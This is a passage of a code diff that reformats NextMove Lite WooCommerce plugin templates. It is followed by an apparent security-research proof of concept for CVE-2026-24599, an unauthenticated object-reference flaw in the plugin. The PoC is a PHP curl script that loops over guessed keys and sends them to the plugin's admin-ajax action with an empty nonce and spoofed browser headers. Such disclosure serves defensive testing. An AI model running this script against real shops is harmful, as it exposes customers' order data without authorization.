+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
 }
--- a/woo-thank-you-page-nextmove-lite/components/image-content/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/help.php
@@ -1,36 +1,36 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
-					option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
-					- Choose Image Content ratio with other options to add image, link and text.
-				</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
+                    option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
+                    - Choose Image Content ratio with other options to add image, link and text.
+                </td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
@@ -6,9 +6,9 @@

 	private static $instance = null;
 	public $instance_campaign_data;
-	public $is_disable      = true;
-	public $viewpath        = '';
-	public $is_multiple     = true;
+	public $is_disable = true;
+	public $viewpath = '';
+	public $is_multiple = true;
 	public $component_limit = 1;

 	public function __construct( $order = false ) {
@@ -93,7 +93,7 @@
 			}
 			if ( $this->data->btn_bg_color != '' ) {
 				$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn']['background'] = $this->data->btn_bg_color;
-				$rgba = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
+				$rgba                                                                                      = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
 				if ( $rgba != '' ) {
 					$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn:hover']['background'] = "rgba({$rgba},0.70)";
 				}
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
@@ -17,7 +17,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -26,42 +26,42 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
 		<?php
 		if ( $source_left != '' ) {
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		if ( $source_right != '' ) {
 			$right_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $right_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $right_img_link_parsed ), esc_url( $source_right ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-	</div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
@@ -6,12 +6,12 @@
 if ( $source != '' ) {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 	?>
-	<div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
+    <div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
 		?>
-		<div class="xlwcty_content">
+        <div class="xlwcty_content">
 			<?php
 			$desc_class = '';
 			if ( ! empty( $this->data->desc_alignment ) ) {
@@ -20,32 +20,32 @@
 			$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 			echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 			?>
-			<div class="xlwcty_imgBox_w xlwcty_clearfix">
+            <div class="xlwcty_imgBox_w xlwcty_clearfix">
 				<?php
 				$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $full_image_link );
 				printf( "<p class='xlwcty_center'><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source ) );
 				?>

-			</div>
+            </div>
 			<?php
 			if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 				$btn_link = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 				?>
-				<div class="xlwcty_clear_20"></div>
-				<div class="xlwcty_clearfix xlwcty_center">
+                <div class="xlwcty_clear_20"></div>
+                <div class="xlwcty_clearfix xlwcty_center">
 					<?php
 					$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 					$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 					?>
-					<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+                    <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 						<?php echo wp_kses_post( $btn_text_parsed ); ?>
-					</a>
-				</div>
+                    </a>
+                </div>
 				<?php
 			}
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 } else {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
@@ -27,7 +27,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -36,32 +36,32 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
 			<?php
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-		<div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        </div>
+        <div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 			echo wp_kses_post( $content_parsed );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
@@ -26,7 +26,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -35,38 +35,38 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
 		<?php
 		if ( $content != '' ) {
 			?>
-			<div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
+            <div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
 				<?php
 				$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 				echo wp_kses_post( $content_parsed );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
--- a/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Social_Sharing extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/help.php
@@ -1,33 +1,33 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/map/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/instance.php
@@ -5,9 +5,9 @@
 class XLWCTY_Shipping_Billing_Based_Map extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $map_add          = '';
-	public $is_disable       = false;
+	public $viewpath = '';
+	public $map_add = '';
+	public $is_disable = false;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/views/view.php
@@ -19,21 +19,21 @@

 ?>
 <div class="xlwcty_Box xlwcty_Map">
-	<div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
-		data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
-		data-marker-text="
+    <div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
+         data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
+         data-marker-text="
 		<?php
-			$marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
-			echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
-		?>
+	     $marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
+	     echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
+	     ?>
 		">
 		<?php
 		if ( empty( $is_google_key_exist ) ) {
-            echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
+			echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
 		}
 		?>
-	</div>
-	<div class="xlwcty_content">
+    </div>
+    <div class="xlwcty_content">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
@@ -44,5 +44,5 @@
 		$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 		echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 		?>
-	</div>
+    </div>
 </div>
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
@@ -1,26 +1,26 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
-			</tr>
-
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
+            </tr>
+
+        </table>
+    </div>
+<?php
+return ob_get_clean();
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
@@ -5,19 +5,19 @@
 class XLWCTY_Content_Order_Acknowledge extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = false;
-	public $viewpath         = '';
-	public $source           = '';
-	public $height           = '';
-	public $width            = '';
-	public $heading1         = '';
-	public $heading1_color   = '';
-	public $heading1_font    = '';
-	public $heading2         = '';
-	public $heading2_color   = '';
-	public $heading2_font    = '';
-	public $icon_type        = '';
-	public $icon_html        = '';
+	public $is_disable = false;
+	public $viewpath = '';
+	public $source = '';
+	public $height = '';
+	public $width = '';
+	public $heading1 = '';
+	public $heading1_color = '';
+	public $heading1_font = '';
+	public $heading2 = '';
+	public $heading2_color = '';
+	public $heading2_font = '';
+	public $icon_type = '';
+	public $icon_html = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
@@ -3,7 +3,7 @@

 XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 ?>
-	<div class="xlwcty_order_info">
+    <div class="xlwcty_order_info">
 		<?php
 		echo $this->icon_html ? wp_kses_post( $this->icon_html ) : '';
 		$heading1_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
@@ -11,5 +11,5 @@
 		$heading2_parsed = $this->data->heading2 ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading2 ) : '';
 		echo $heading2_parsed

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24599 - NextMove Lite <= 2.23.0 - Unauthenticated Insecure Direct Object Reference

<?php

$target_url = "http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php";

// The vulnerable AJAX action
$action = "xlwcty_get_page";

// Test with different key values to enumerate objects
$test_keys = [
    "order_123",
    "page_456",
    "customer_789",
    "settings_global",
    "template_default"
];

echo "Testing CVE-2026-24599 on: " . $target_url . "nn";

foreach ($test_keys as $key) {
    $post_data = [
        'action' => $action,
        'key' => $key,
        '_ajax_nonce' => '' // Nonce is not required due to the vulnerability
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic legitimate browser request
    $headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With: XMLHttpRequest',
        'Connection: close'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Testing key: " . $key . "n";
    echo "HTTP Code: " . $http_code . "n";
    
    if ($response !== false) {
        if (strpos($response, 'error') !== false || strpos($response, 'invalid') !== false) {
            echo "Result: Invalid key or error responsen";
        } else if (!empty(trim($response))) {
            echo "Result: POTENTIALLY VULNERABLE - Received data for keyn";
            echo "Response preview: " . substr($response, 0, 200) . "...n";
        } else {
            echo "Result: Empty responsen";
        }
    } else {
        echo "Result: Request failed - " . curl_error($ch) . "n";
    }
    
    echo "n";
    curl_close($ch);
    
    // Small delay between requests
    sleep(1);
}

echo "Exploitation test complete. If any key returned data without authentication,n";
echo "the site is vulnerable to CVE-2026-24599.n";

?>